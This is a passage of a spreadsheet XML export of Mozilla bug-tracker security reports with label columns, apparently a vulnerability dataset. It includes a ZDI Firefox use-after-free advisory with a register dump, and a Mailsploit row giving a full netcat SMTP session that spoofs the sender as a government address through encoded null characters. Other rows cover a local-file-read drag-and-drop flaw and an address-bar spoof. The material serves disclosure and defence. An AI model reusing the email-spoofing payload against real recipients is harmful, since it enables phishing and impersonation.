      <c r="J3432" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K3432" t="inlineStr">
        <is>
          <t>1.9.2 Branch</t>
        </is>
      </c>
      <c r="L3432" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3432" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3432" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3432" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3432" t="inlineStr">
        <is>
          <t>[sg:critical][fix-range-wanted]</t>
        </is>
      </c>
      <c r="Q3432" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3432" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3432" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3432" t="n">
        <v>1</v>
      </c>
      <c r="U3432" t="n">
        <v>0</v>
      </c>
      <c r="V3432" t="n">
        <v>38</v>
      </c>
      <c r="W3432" t="inlineStr">
        <is>
          <t>ZDI-CAN-1141: Mozilla Firefox appendChild DOM Tree Inconsistency Remote Code Execution Vulnerability
-- CVSS ----------------------------------------------------------------
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)
-- ABSTRACT ------------------------------------------------------------
TippingPoint has identified a vulnerability affecting the following products:
    Mozilla Firefo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results when .setUserData() handlers are used with an object and .appendChild() is called within a handler.  Ultimately the
import operation resulting from an .appendChild() is not guarded from mutation, and invalid DOM trees can result.  Invalid DOM trees can be
navigated resulting in dereferencing invalid pointers which can be leveraged to execute arbitrary code in the context of the browser.
Version(s)  tested: Mozilla Firefox 3.6.13
Platform(s) tested: Windows XP SP3
DOM method appendChild() seems flawed. Due to the way adoptNode() user data callback mechanism is implemented, user can "silently" re-adopt
node from within the handler. Hook is later re-executed, which allows attacker to build inconsistent DOM tree: with a single node being set as
a child of 2 parents at the same time. Child itself will be pointing back at one of its parents as THE parent. Somehow like on the diagram below:
       root
      /+  \+
     //    \\
    +/      +\
  parent1 parent2
    \       /+
     \     //
      +   +/
      child
In other words, JavaScript notation, all assertions hold:
  root.childNodes.length == 2
  root.childNodes[0] == parent1
  root.childNodes[1] == parent2
  root.parentNode == null
  parent1.childNodes.length == 1
  parent1.childNodes[0] == child
  parent1.parentNode == root
  parent2.childNodes.length == 1
  parent2.childNodes[0] == child
  parent2.parentNode == root
  child.childNodes.length == 0
  child.parentNode == parent2
This invalid DOM tree can be exploited in numerous ways, the POC illustrates one example using node iteration.  The example POC results in attacker control of EIP:
(2e0.190): Access violation - code c0000005 (!!! second chance !!!)
eax=0c0c0c0c ebx=04ad2460 ecx=04ad2460 edx=109d8c34 esi=01b6a954
edi=00000000
eip=0c0c0c0c esp=0012eba8 ebp=0012ebec iopl=0         nv up ei pl nz na
pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000            
efl=00000206
&lt;Unloaded_ta.dll&gt;+0xc0c0c0b:
0c0c0c0c 0c0c            or      al,0Ch
Regarding filtering, this vulnerability can be triggered via JavaScript with many potential representations in code and as a result may be difficult if not impossible to filter.
-- CREDIT --------------------------------------------------------------
This vulnerability was discovered by:
    * regenrecht</t>
        </is>
      </c>
      <c r="X3432" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3433">
      <c r="A3433" t="n">
        <v>1087565</v>
      </c>
      <c r="B3433" t="inlineStr">
        <is>
          <t>2014-10-22 12:41:03 -0700</t>
        </is>
      </c>
      <c r="C3433" t="inlineStr">
        <is>
          <t>IPC Channel does not validate the listener.</t>
        </is>
      </c>
      <c r="D3433" t="inlineStr">
        <is>
          <t>2021-10-21 12:20:43 -0700</t>
        </is>
      </c>
      <c r="E3433" t="n">
        <v>1</v>
      </c>
      <c r="F3433" t="n">
        <v>1</v>
      </c>
      <c r="G3433" t="n">
        <v>3</v>
      </c>
      <c r="H3433" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3433" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3433" t="inlineStr">
        <is>
          <t>IPC</t>
        </is>
      </c>
      <c r="K3433" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3433" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3433" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3433" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3433" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3433" t="inlineStr">
        <is>
          <t>[adv-main38+][adv-esr31.7+]</t>
        </is>
      </c>
      <c r="Q3433" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3433" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3433" t="inlineStr">
        <is>
          <t>mozilla40</t>
        </is>
      </c>
      <c r="T3433" t="n">
        <v>1</v>
      </c>
      <c r="U3433" t="n">
        <v>0</v>
      </c>
      <c r="V3433" t="n">
        <v>33</v>
      </c>
      <c r="W3433" t="inlineStr">
        <is>
          <t>We have have probably inherited CVE-2011-3079 from our import of Chromium's IPC code 5½ years ago.
My understanding of this bug is: Chromium IPC endpoints have names, and knowing the name is sufficient to connect to it.  These names were predictable and, on Windows, are reflected in the named pipe namespace which an untrusted process can traverse.  The patch adds 32 bits of randomness to each name, and excludes that part from the pipe name on Windows.  (Anyone with more knowledge of IPC is invited to correct this summary if needed.)
There's also a patch on the bug which seems to not be directly related to the IPC issue itself, and has something to do with Windows security levels: https://crbug.com/117627#c18
+++ This bug was initially created as a clone of Bug #958895 +++
"IPC Channel does not validate the listener."
http://code.google.com/p/chromium/issues/detail?id=117627</t>
        </is>
      </c>
      <c r="X3433" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3434">
      <c r="A3434" t="n">
        <v>658864</v>
      </c>
      <c r="B3434" t="inlineStr">
        <is>
          <t>2011-05-22 04:42:35 -0700</t>
        </is>
      </c>
      <c r="C3434" t="inlineStr">
        <is>
          <t>The GC can still happen when reporting OOM</t>
        </is>
      </c>
      <c r="D3434" t="inlineStr">
        <is>
          <t>2011-11-15 09:19:09 -0800</t>
        </is>
      </c>
      <c r="E3434" t="n">
        <v>1</v>
      </c>
      <c r="F3434" t="n">
        <v>1</v>
      </c>
      <c r="G3434" t="n">
        <v>3</v>
      </c>
      <c r="H3434" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3434" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3434" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3434" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3434" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3434" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3434" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3434" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3434" t="inlineStr">
        <is>
          <t>[sg:critical?] fixed-in-tracemonkey [qa-]</t>
        </is>
      </c>
      <c r="Q3434" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3434" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3434" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3434" t="n">
        <v>1</v>
      </c>
      <c r="U3434" t="n">
        <v>0</v>
      </c>
      <c r="V3434" t="n">
        <v>9</v>
      </c>
      <c r="W3434" t="inlineStr">
        <is>
          <t>The bug 640265 tries to prevent the GC from happening when reporting OOM. Hover, the implemented fix has a race that still allows to run the GC under OOM. The problem comes from using the global boolean JSRuntime::inOOMReport flag that is updated and checked outside a lock. As such the check in the js_GC for the flag can happen after an OOM also happens on another thread which can clear the flag before js_GC accesses it.</t>
        </is>
      </c>
      <c r="X3434" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3435">
      <c r="A3435" t="n">
        <v>1423432</v>
      </c>
      <c r="B3435" t="inlineStr">
        <is>
          <t>2017-12-05 19:42:28 -0800</t>
        </is>
      </c>
      <c r="C3435" t="inlineStr">
        <is>
          <t>Mailsploit part 1: From addresses with encoded null character are cut off</t>
        </is>
      </c>
      <c r="D3435" t="inlineStr">
        <is>
          <t>2017-12-30 22:23:43 -0800</t>
        </is>
      </c>
      <c r="E3435" t="n">
        <v>1</v>
      </c>
      <c r="F3435" t="n">
        <v>1</v>
      </c>
      <c r="G3435" t="n">
        <v>3</v>
      </c>
      <c r="H3435" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3435" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J3435" t="inlineStr">
        <is>
          <t>MIME</t>
        </is>
      </c>
      <c r="K3435" t="inlineStr">
        <is>
          <t>52</t>
        </is>
      </c>
      <c r="L3435" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3435" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3435" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3435" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3435" t="inlineStr"/>
      <c r="Q3435" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3435" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3435" t="inlineStr">
        <is>
          <t>Thunderbird 59.0</t>
        </is>
      </c>
      <c r="T3435" t="n">
        <v>1</v>
      </c>
      <c r="U3435" t="n">
        <v>3</v>
      </c>
      <c r="V3435" t="n">
        <v>54</v>
      </c>
      <c r="W3435" t="inlineStr">
        <is>
          <t>Part of bug 1423430
https://www.mailsploit.com
Reproduction:
1. Send yourself an email with SMTP:
$ netcat ###YOUR.SMTP.SERVER### 25
MAIL FROM:&lt;=?utf-8?b?cG90dXNAd2hpdGVob3VzZS5nb3Y=?==?utf-8?Q?=00?==?utf-8?b?cG90dXNAd2hpdGVob3VzZS5nb3Y=?=@mailsploit.com&gt;
RCPT TO: &lt;###your.email.address@your.own.provider.not.gmail.and.co###&gt;
DATA
From: =?utf-8?b?cG90dXNAd2hpdGVob3VzZS5nb3Y=?==?utf-8?Q?=00?==?utf-8?b?cG90dXNAd2hpdGVob3VzZS5nb3Y=?=@mailsploit.com
To: moron@example.com
Date: Wed, 6 December 2017 22:00:00 +0200
Subject: mailsploit
Yeah, right.
.
QUIT
2. Open the email in Thunderbird
Actual result:
* The From field displays:
"potus@whitehouse.gov
* If you click on the email address, you still see the same email address in the context menu.
Expected result:
* The From field displays:
-potus-whitehouse.gov@mailsploit.com
or even better:
invalid@mailsploit.com
Analysis:
I think the bug here is that we cut the string off at an embedded null \0 character.
That might be in libmime or in JSMime. We need to find the place, and before that happens, we should strip the null character.</t>
        </is>
      </c>
      <c r="X3435" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3436">
      <c r="A3436" t="n">
        <v>500644</v>
      </c>
      <c r="B3436" t="inlineStr">
        <is>
          <t>2009-06-26 07:22:42 -0700</t>
        </is>
      </c>
      <c r="C3436" t="inlineStr">
        <is>
          <t>PAC: crash when using PAC-based manual proxy config and the attached testcase</t>
        </is>
      </c>
      <c r="D3436" t="inlineStr">
        <is>
          <t>2009-11-04 05:43:44 -0800</t>
        </is>
      </c>
      <c r="E3436" t="n">
        <v>1</v>
      </c>
      <c r="F3436" t="n">
        <v>1</v>
      </c>
      <c r="G3436" t="n">
        <v>3</v>
      </c>
      <c r="H3436" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3436" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3436" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3436" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3436" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3436" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3436" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3436" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3436" t="inlineStr">
        <is>
          <t>[sg:moderate] (potentially exploitable if using PAC and an untrusted PAC server)</t>
        </is>
      </c>
      <c r="Q3436" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3436" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3436" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3436" t="n">
        <v>1</v>
      </c>
      <c r="U3436" t="n">
        <v>8</v>
      </c>
      <c r="V3436" t="n">
        <v>76</v>
      </c>
      <c r="W3436" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)
When opening/rendering the attached HTML page with Firefox 3.5rc2/rc3 on Windows XP SP3, the browser consistently crashes. The problem was first observed on Firefox 3.5b99.
The same issue was not observed using the same browser version but on Windows XP SP2 or on the MacOS X version of the same browser. The same page opens fine with Firefox 3.0.x on all platforms including Win XP SP3.
We did not test it on Windows Vista.
The same behavior was reproducible when running Firefox 3.5 in safe-mode.
Reproducible: Always
Steps to Reproduce:
1. Download the isolated test case zip file at the following URL: http://www.mediafire.com/file/rjqmznznbmo/ff3crash.zip
2. Unzip the test case in the "htdocs" directory of a web server. We used Apache 2.2
3. Access the web page using Firefox 3.5rc3 running on a Windows XP SP3. The URL will be: http://&lt;your-server&gt;/ff3crash/ff35-crash.html
Actual Results:  
The Firefox 3.5 browser crashes.
Expected Results:  
The browser should not crash - the rendered page is just a blank white page.
The test page imports JavaScript/CSS from YUI (Yahoo User Interface toolkit) and TinyMCE (the popular JavaScript-based RichTextEditor). This isolated test case is a simplified version of a HTML page from an Oracle product which is already in production. The same page has been working fine when accessed with Firefox 3.0.x on all platforms. It is crucial for Oracle to have this bug fixed before Firefox 3.5 goes production.</t>
        </is>
      </c>
      <c r="X3436" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3437">
      <c r="A3437" t="n">
        <v>776972</v>
      </c>
      <c r="B3437" t="inlineStr">
        <is>
          <t>2012-07-24 10:19:21 -0700</t>
        </is>
      </c>
      <c r="C3437" t="inlineStr">
        <is>
          <t>Increase bugs_activity primary key size to INTSERIAL for future growth</t>
        </is>
      </c>
      <c r="D3437" t="inlineStr">
        <is>
          <t>2012-07-25 12:49:51 -0700</t>
        </is>
      </c>
      <c r="E3437" t="n">
        <v>1</v>
      </c>
      <c r="F3437" t="n">
        <v>1</v>
      </c>
      <c r="G3437" t="n">
        <v>4</v>
      </c>
      <c r="H3437" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3437" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3437" t="inlineStr">
        <is>
          <t>Database</t>
        </is>
      </c>
      <c r="K3437" t="inlineStr">
        <is>
          <t>4.2</t>
        </is>
      </c>
      <c r="L3437" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3437" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3437" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3437" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3437" t="inlineStr"/>
      <c r="Q3437" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3437" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3437" t="inlineStr">
        <is>
          <t>Bugzilla 4.4</t>
        </is>
      </c>
      <c r="T3437" t="n">
        <v>1</v>
      </c>
      <c r="U3437" t="n">
        <v>0</v>
      </c>
      <c r="V3437" t="n">
        <v>8</v>
      </c>
      <c r="W3437" t="inlineStr">
        <is>
          <t>Created attachment 645360
Patch to increase primary key size of bugs_activity (v1)
Currently bugs_activity's primary key is MEDIUMSERIAL which is limited to ~8.3 million rows. Several large Bugzilla installations will hit that limit sooner rather than later so the size needs to be increases to INTSERIAL.
Patch attached</t>
        </is>
      </c>
      <c r="X3437" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3438">
      <c r="A3438" t="n">
        <v>684882</v>
      </c>
      <c r="B3438" t="inlineStr">
        <is>
          <t>2011-09-06 09:42:53 -0700</t>
        </is>
      </c>
      <c r="C3438" t="inlineStr">
        <is>
          <t>Random video memory grabbed into WebGL cube map textures on Mac OS, including on 10.7.1, on Intel GPUs</t>
        </is>
      </c>
      <c r="D3438" t="inlineStr">
        <is>
          <t>2017-05-07 09:38:41 -0700</t>
        </is>
      </c>
      <c r="E3438" t="n">
        <v>1</v>
      </c>
      <c r="F3438" t="n">
        <v>1</v>
      </c>
      <c r="G3438" t="n">
        <v>3</v>
      </c>
      <c r="H3438" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3438" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3438" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K3438" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3438" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3438" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3438" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3438" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3438" t="inlineStr">
        <is>
          <t>[sg:vector-high][qa!] Apple bug 10245261</t>
        </is>
      </c>
      <c r="Q3438" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3438" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3438" t="inlineStr">
        <is>
          <t>mozilla10</t>
        </is>
      </c>
      <c r="T3438" t="n">
        <v>1</v>
      </c>
      <c r="U3438" t="n">
        <v>0</v>
      </c>
      <c r="V3438" t="n">
        <v>93</v>
      </c>
      <c r="W3438" t="inlineStr">
        <is>
          <t>Created attachment 558499
firefox_6_0_1.png
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Steps to reproduce:
I loaded this WebGL demo in Firefox 6.0.1:
http://mrdoob.github.com/three.js/examples/webgl_materials_cars_anaglyph.html
Actual results:
The background cube texture does not render correctly. What i see is randomly garbled artefacts of parts of my screen. See attached screenshots.
The effect is very similar to what has already been reported in this bug: https://bugzilla.mozilla.org/show_bug.cgi?id=631258 - just that i run a different OS version and a different graphics card.
Note that i can reproduce this issue (even after rebooting my machine), and that Chrome 13 shows the exact same problem (suggesting that it is a low level problem, possibly with the graphics card drivers).
Some info on my hardware:
Hardware Overview:
  Model Name:	MacBook Pro
  Model Identifier:	MacBookPro8,1
  Processor Name:	Intel Core i5
  Processor Speed:	2.3 GHz
  Number of Processors:	1
  Total Number of Cores:	2
  L2 Cache (per Core):	256 KB
  L3 Cache:	3 MB
  Memory:	4 GB
  Boot ROM Version:	MBP81.0047.B0E
  SMC Version (system):	1.68f96
System Software Overview:
  System Version:	Mac OS X 10.6.8 (10K549)
  Kernel Version:	Darwin 10.8.0
  Boot Volume:	Macintosh HD
  Boot Mode:	Normal
  Secure Virtual Memory:	Enabled
  64-bit Kernel and Extensions:	Yes
Intel HD Graphics 3000:
  Chipset Model:	Intel HD Graphics 3000
  Type:	GPU
  Bus:	Built-In
  VRAM (Total):	384 MB
  Vendor:	Intel (0x8086)
  Device ID:	0x0126
  Revision ID:	0x0009
  Displays:
Color LCD:
  Resolution:	1280 x 800
  Pixel Depth:	32-Bit Color (ARGB8888)
  Main Display:	Yes
  Mirror:	Off
  Online:	Yes
  Built-In:	Yes
Display Connector:
  Status:	No Display Connected
Expected results:
A nice cube texture should be shown, without artefacts.</t>
        </is>
      </c>
      <c r="X3438" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3439">
      <c r="A3439" t="n">
        <v>935178</v>
      </c>
      <c r="B3439" t="inlineStr">
        <is>
          <t>2013-11-05 12:13:14 -0800</t>
        </is>
      </c>
      <c r="C3439" t="inlineStr">
        <is>
          <t>Story - Support broadcast message for switching between Metro and Desktop</t>
        </is>
      </c>
      <c r="D3439" t="inlineStr">
        <is>
          <t>2013-11-29 01:36:29 -0800</t>
        </is>
      </c>
      <c r="E3439" t="n">
        <v>1</v>
      </c>
      <c r="F3439" t="n">
        <v>1</v>
      </c>
      <c r="G3439" t="n">
        <v>6</v>
      </c>
      <c r="H3439" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3439" t="inlineStr">
        <is>
          <t>Firefox for Metro Graveyard</t>
        </is>
      </c>
      <c r="J3439" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3439" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3439" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3439" t="inlineStr">
        <is>
          <t>Windows 8.1</t>
        </is>
      </c>
      <c r="N3439" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3439" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3439" t="inlineStr">
        <is>
          <t>[block28][completed-oak] feature=story c=tbd u=tbd p=3</t>
        </is>
      </c>
      <c r="Q3439" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3439" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3439" t="inlineStr">
        <is>
          <t>Firefox 28</t>
        </is>
      </c>
      <c r="T3439" t="n">
        <v>1</v>
      </c>
      <c r="U3439" t="n">
        <v>0</v>
      </c>
      <c r="V3439" t="n">
        <v>11</v>
      </c>
      <c r="W3439" t="inlineStr">
        <is>
          <t>We should add support for auto-switch to Metro and auto-switch to Desktop browsers.
To do this we should follow Intels' guidelines here:
http://software.intel.com/en-us/articles/detecting-slateclamshell-mode-screen-orientation-in-convertible-pc
Basically we'll need to add to our WinRT and Win32 widget layer, message handling for WM_SETTINGS with an lPram of “ConvertibleSlateMode”.
To detect the mode we'd use GetSystemMetrics:
BOOL bSlateMode = (GetSystemMetrics(SM_CONVERTIBLESLATEMODE) == 0);
We'd use the code from bug 924911 and bug 924914 to do a relaunch in response to these messages if a mode switch is detected and the wrong browser is running.
p=3
Note for Marco: I'm going to delay subtracting this from the contingency fund until we get hardware that supports this.  That way we can verify a good experience.</t>
        </is>
      </c>
      <c r="X3439" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3440">
      <c r="A3440" t="n">
        <v>1226977</v>
      </c>
      <c r="B3440" t="inlineStr">
        <is>
          <t>2015-11-22 11:03:56 -0800</t>
        </is>
      </c>
      <c r="C3440" t="inlineStr">
        <is>
          <t>Outgoing dataTransfer items are not filtered</t>
        </is>
      </c>
      <c r="D3440" t="inlineStr">
        <is>
          <t>2024-05-30 09:07:13 -0700</t>
        </is>
      </c>
      <c r="E3440" t="n">
        <v>1</v>
      </c>
      <c r="F3440" t="n">
        <v>1</v>
      </c>
      <c r="G3440" t="n">
        <v>3</v>
      </c>
      <c r="H3440" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3440" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3440" t="inlineStr">
        <is>
          <t>DOM: Copy &amp; Paste and Drag &amp; Drop</t>
        </is>
      </c>
      <c r="K3440" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3440" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3440" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3440" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3440" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3440" t="inlineStr">
        <is>
          <t>[adv-main48+]</t>
        </is>
      </c>
      <c r="Q3440" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3440" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3440" t="inlineStr">
        <is>
          <t>mozilla48</t>
        </is>
      </c>
      <c r="T3440" t="n">
        <v>1</v>
      </c>
      <c r="U3440" t="n">
        <v>0</v>
      </c>
      <c r="V3440" t="n">
        <v>57</v>
      </c>
      <c r="W3440" t="inlineStr">
        <is>
          <t>Outgoing dataTransfer items are not filtered
1. Open https://ebenda.org/2015/drag-drop/ in Firefox and Chrome
2. Drag and drop the displayed Firefox icon to Chrome
3. See the contents of your root directory/C: drive, the web page has read access to any file on your system
Windows convention seems to be to treat FileNameW, FileName and CF_HDROP items as (trusted) filenames (as done by Chromium in https://chromium.googlesource.com/chromium/src.git/+/master/ui/base/clipboard/clipboard_util_win.cc#179 ).
X11 convention seems to be (used by GNOME Files and by Chromium in https://chromium.googlesource.com/chromium/src.git/+/master/ui/base/dragdrop/os_exchange_data_provider_aurax11.cc#306 ) to treat file URIs in "text/uri-list" as (trusted) filenames.
Thus, dataTransfer items have to be filtered for (at least) these types and not passed through directly to the system.
Chromium does not use generic items but puts most generic items in a combined "chromium/x-web-custom-data" item. Additionally, it seems to not use "text/uri-list" at all for URIs but sets "text/x-moz-url" and "_NETSCAPE_URL". Even these values are filtered for file URIs (if not set by pages accessed via file:// themselves): https://chromium.googlesource.com/chromium/src.git/+/master/content/browser/renderer_host/render_view_host_impl.cc#1118 .</t>
        </is>
      </c>
      <c r="X3440" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3441">
      <c r="A3441" t="n">
        <v>1321719</v>
      </c>
      <c r="B3441" t="inlineStr">
        <is>
          <t>2016-12-01 19:01:46 -0800</t>
        </is>
      </c>
      <c r="C3441" t="inlineStr">
        <is>
          <t>Address bar spoof using blob URI scheme</t>
        </is>
      </c>
      <c r="D3441" t="inlineStr">
        <is>
          <t>2024-05-30 09:23:59 -0700</t>
        </is>
      </c>
      <c r="E3441" t="n">
        <v>1</v>
      </c>
      <c r="F3441" t="n">
        <v>1</v>
      </c>
      <c r="G3441" t="n">
        <v>3</v>
      </c>
      <c r="H3441" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3441" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3441" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K3441" t="inlineStr">
        <is>
          <t>52 Branch</t>
        </is>
      </c>
      <c r="L3441" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3441" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3441" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3441" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3441" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main52+]</t>
        </is>
      </c>
      <c r="Q3441" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3441" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3441" t="inlineStr">
        <is>
          <t>mozilla53</t>
        </is>
      </c>
      <c r="T3441" t="n">
        <v>0</v>
      </c>
      <c r="U3441" t="n">
        <v>0</v>
      </c>
      <c r="V3441" t="n">
        <v>26</v>
      </c>
      <c r="W3441" t="inlineStr">
        <is>
          <t>Created attachment 8816351
PoC.html
User Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
Steps to reproduce:
Tested on latest nightly with and without e10s. Does not work on latest stable, posting regression range soon.
Run attached PoC
Actual results:
We can change location.pathname which leads to spoof
Expected results:
It's blocked in stable</t>
        </is>
      </c>
      <c r="X3441" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3442">
      <c r="A3442" t="n">
        <v>408726</v>
      </c>
      <c r="B3442" t="inlineStr">
        <is>
          <t>2007-12-17 13:59:42 -0800</t>
        </is>
      </c>
      <c r="C3442" t="inlineStr">
        <is>
          <t>Add a enable checkbox to the mirror create form</t>
        </is>
      </c>
      <c r="D3442" t="inlineStr">
        <is>
          <t>2010-01-11 08:19:52 -0800</t>
        </is>
      </c>
      <c r="E3442" t="n">
        <v>1</v>
      </c>
      <c r="F3442" t="n">
        <v>1</v>
      </c>
      <c r="G3442" t="n">
        <v>4</v>
      </c>
      <c r="H3442" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3442" t="inlineStr">
        <is>
          <t>Webtools</t>
        </is>
      </c>
      <c r="J3442" t="inlineStr">
        <is>
          <t>Bouncer</t>
        </is>
      </c>
